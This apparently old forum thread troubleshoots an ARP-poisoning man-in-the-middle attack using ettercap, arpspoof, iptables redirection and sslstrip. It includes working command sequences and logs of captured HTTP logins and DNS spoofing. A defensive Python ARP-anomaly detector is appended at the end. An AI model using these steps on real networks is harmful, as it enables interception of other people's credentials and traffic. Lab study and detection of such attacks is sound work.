I'm having trouble with ettercap: when it scans for hosts it detects the router but not me (connected via wifi), so I can't ARP poison. Does anyone know what to do here?
Is your wi-fi connected machine actually on the same subnet?
Yes they are on the same subnet, if I run via terminal with:
sudo ettercap -T --iface ra0 -q -M arp:remote /192.168.0.1/ // ***(192.168.0.1 is router)
then it will scan and add the router to the hosts list, and not detect my IP (192.168.0.3) but I have noticed if I use links (terminal browser) and log in to the router I get this:
HTTP : 192.168.0.1:80 -> USER: <MYUSER> PASS: <MYPASS> INFO: (null)
I don't get any output if I try SSL logins, and I don't get any output whatsoever from Firefox.
Ettercap doesn't show your IP, but if you are ARP poisoning all hosts on the subnet you can also see your own surfing.
And if you are new to ettercap, why don't you try ettercap with the graphical interface? This will be much easier if you are new to this program.
I prefer ettercap options from the terminal if I must combine the program with other tools, so I don't need to have many open windows.
Also, for SSL you must uncomment lines in etter.conf and combine the attack with sslstrip (nice little tool).
Look here, a nice video from g0tmi1k about an attack to sniff SSL connections: http://forums.remote-exploit.org/bac...slstrip-3.html .
I thought this may have been the case; that's why I poisoned all.
Same here...
I have already set up etter.conf and am combining with sslstrip, the parts I have changed in etter.conf are:
ec_uid = 0
ec_gid = 0
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
arpspoof redirects traffic to my MAC but only if I do not specify myself as the target. If I do I get "arpspoof: couldn't arp for host 192.168.0.3"
This is the iptables command I am running:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
I run sslstrip
I get NOTHING. Totally stumped
Insert this before the PREROUTING iptables rule and tell me the results: echo 1 > /proc/sys/net/ipv4/ip_forward
And when you ARP spoof, target 1 is the IP you are attacking and the second target is your gateway; try this attack with specified targets.
ARP spoofing all hosts on the gateway is good if you have 4 or more hosts on the network; try first with a specified target.
Tell me the results after you try. After you set IP forwarding and prerouting, then start sslstrip.
If the page you are visiting on the victim machine has http and is a login page that normally has https, then your attack is doing fine.
Tried this now on ubuntu and Backtrack 4
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~#
root@bt:~# arpspoof -i ra0 -t 192.168.0.2 192.168.0.1
arpspoof: couldn't arp for host 192.168.0.2
root@bt:~# (192.168.0.2 is now my attacking machine as its the only one available at the moment)
root@bt:~# arpspoof -i ra0 192.168.0.1
0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98
etc....
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@bt:~#
root@bt:~# sslstrip -a -f -k
Ettercap > Unified sniffing > scan hosts > 192.168.0.1 - target 2 > mitm >arp >sniff remote > start
Listening on ra0... (Ethernet)
ra0 -> 00:22:75:3B:E3:98 192.168.0.2 255.255.255.0
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
1 hosts added to the hosts list...
Host 192.168.0.1 added to TARGET2
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : 192.168.0.1 00:22:75:3B:E3:98
Starting Unified sniffing...
HTTP : 208.101.8.53:80 -> USER: ****** PASS: **** INFO: <A forum address>
HTTP : 192.168.0.1:80 -> USER: ***** PASS: ***** INFO: 192.168.0.1
HTTP : 67.15.24.40:80 -> USER: **** PASS: ***** INFO: <a forum address>
Activating chk_poison plugin...
chk_poison: Checking poisoning status...
chk_poison: No poisoning at all
I just realized I set it up for dns spoofing, which is working.
Activating dns_spoof plugin...
dns_spoof: wwwdot-microsoft-dotcom spoofed to [198.182.196.56]
Unified sniffing was stopped.
Host 192.168.0.1 added to TARGET1
I stopped the sniff and put the router in target 1:
no SSL but HTML logins as above
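
From the defender's side, the repeated broadcast "arp reply 192.168.0.1 is-at ..." lines in the session above are the observable trace of this technique. The following is an added example, not part of the thread: a Python check that reads lines in that format and flags a gateway IP claimed by a MAC other than the known one. The router MAC 02:00:00:00:00:01 and the sample lines are constructed placeholders.

```python
import re
from collections import Counter

# Line format taken from the arpspoof output quoted in the thread:
#   <src mac> <dst mac> 0806 42: arp reply <ip> is-at <mac>
ARP_REPLY = re.compile(
    r"^(?P<src>[0-9a-f:]+)\s+(?P<dst>[0-9a-f:]+)\s+0806\s+\d+:\s+"
    r"arp reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at (?P<mac>[0-9a-f:]+)$",
    re.IGNORECASE,
)

def norm_mac(mac):
    """Zero-pad and lowercase, so 0:22:75:3b:e3:98 == 00:22:75:3B:E3:98."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))

def find_arp_anomalies(lines, trusted=None):
    """Count suspicious ARP replies, keyed by (kind, ip, claimed_mac).

    trusted maps IP -> known-good MAC (e.g. the gateway from an inventory).
    Without a trusted entry, an IP claimed by a second MAC is still flagged.
    """
    trusted = {ip: norm_mac(mac) for ip, mac in (trusted or {}).items()}
    first_seen = {}            # ip -> first MAC observed claiming it
    findings = Counter()
    for line in lines:
        m = ARP_REPLY.match(line.strip())
        if not m:
            continue           # not an ARP reply line; ignore
        ip, mac = m["ip"], norm_mac(m["mac"])
        if ip in trusted:
            if mac != trusted[ip]:
                findings[("binding_mismatch", ip, mac)] += 1
        elif first_seen.setdefault(ip, mac) != mac:
            findings[("mac_changed", ip, mac)] += 1
    return dict(findings)

# Constructed sample: one reply from a placeholder router MAC, then
# broadcast replies in the shape shown in the thread.
SAMPLE = [
    "2:0:0:0:0:1 0:22:75:3b:e3:98 0806 42: arp reply 192.168.0.1 is-at 2:0:0:0:0:1",
    "0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98",
    "0:22:75:3b:e3:98 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at 0:22:75:3b:e3:98",
    "etc....",
]

if __name__ == "__main__":
    known = {"192.168.0.1": "02:00:00:00:00:01"}  # placeholder gateway binding
    for finding, count in find_arp_anomalies(SAMPLE, known).items():
        print(finding, count)
```

A static ARP entry for the gateway on each client, or dynamic ARP inspection on a managed switch, enforces the same binding that this check only observes.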